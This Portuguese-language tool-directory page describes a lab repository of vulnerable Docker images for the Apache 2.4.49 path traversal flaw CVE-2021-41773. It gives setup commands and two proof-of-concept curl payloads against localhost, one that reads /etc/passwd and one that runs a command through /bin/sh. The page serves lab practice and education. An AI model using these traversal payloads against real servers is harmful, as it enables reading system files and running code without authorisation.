Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-41773 — Imagens Docker vulneráveis para CVE-2021-41773 | Kitploit
Ferramentas/GitHubGitHub/blueteamsteve/cve-2021-41773
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubblueteamsteve/cve-2021-41773

CVE-2021-41773

Imagens Docker vulneráveis para CVE-2021-41773

Ver Repositório
2382há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Imagens Docker vulneráveis para Apache path traversal CVE-2021-41773

Esta vulnerabilidade apenas se aplica à versão 2.4.49 com configurações não padrão específicas. Em certas situações, pode resultar em leitura de arquivos ou execução de código.

tweet https://twitter.com/ptswarm/status/1445376079548624899

Configuração vulnerável para leitura de arquivos

Os contêineres podem ser baixados diretamente do Docker Hub usando

docker pull blueteamsteve/cve-2021-41773:no-cgid

e executados usando

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

Os logs do Apache podem ser visualizados com o comando abaixo, ou apenas remova "-dit" do comando run acima para usar stdio em streaming docker logs <container-id>

PoC para leitura de arquivos

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Configuração vulnerável para RCE

Os contêineres podem ser baixados diretamente do Docker Hub usando

docker pull blueteamsteve/cve-2021-41773:with-cgid

e executados usando

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

Os logs do Apache podem ser visualizados com o comando abaixo, ou apenas remova "-dit" do comando run acima para usar stdio em streaming docker logs <container-id>

PoC para RCE

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

Criar contêineres Docker personalizados

Modifique e crie suas próprias versões usando o dockerfile e os arquivos de template httpd.conf nos subdiretórios

  • Use ./no-cgi para a configuração vulnerável à leitura de arquivos
  • Use ./with-cgi para a configuração vulnerável à execução de código
Baixar ferramenta